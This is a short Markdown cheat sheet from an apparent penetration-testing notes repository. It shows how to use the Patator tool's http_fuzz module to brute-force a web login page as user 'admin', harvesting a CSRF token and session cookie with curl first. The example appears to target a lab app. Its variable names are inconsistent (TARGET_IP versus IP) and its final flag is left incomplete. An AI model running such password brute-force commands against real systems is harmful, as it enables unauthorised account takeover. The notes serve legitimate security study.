whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/hashes/bruteforce/patator.md

24 lines
855 B
Markdown
Raw Blame History

# Patator Bruteforcing
* [Lanjelot's Repo](https://github.com/lanjelot/patator/)
## Modules
* Available modules can be found under `patator --help`
* Module specifics can be found via `patator <module> -h`
## Using a Module
* For example `http_fuzz` can be used via
```sh
TARGET_IP=10.0.47.11
CSRF=$(curl -s -c stored.cookie "${IP}/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
SESSION_ID=$(grep PHPSESSID stored.cookie | awk -F ' ' '{print $7}')
echo "The CSRF is: $CSRF"
echo "The PHPSESSID is: $SESSION_ID"
patator.py http_fuzz method=POST --threads=64 timeout=10 url="http://${TARGET_IP}/login.php" 0=passwords.txt body="username=admin&password=FILE0&Login=Login&user_token=${CSRF}" header="Cookie: PHPSESSID=${SESSION_ID}; security=impossible" -x quit:fgrep!=login.php -x ignore:fgrep='Location: login.php' -x
```
Reference in New Issue View Git Blame Copy Permalink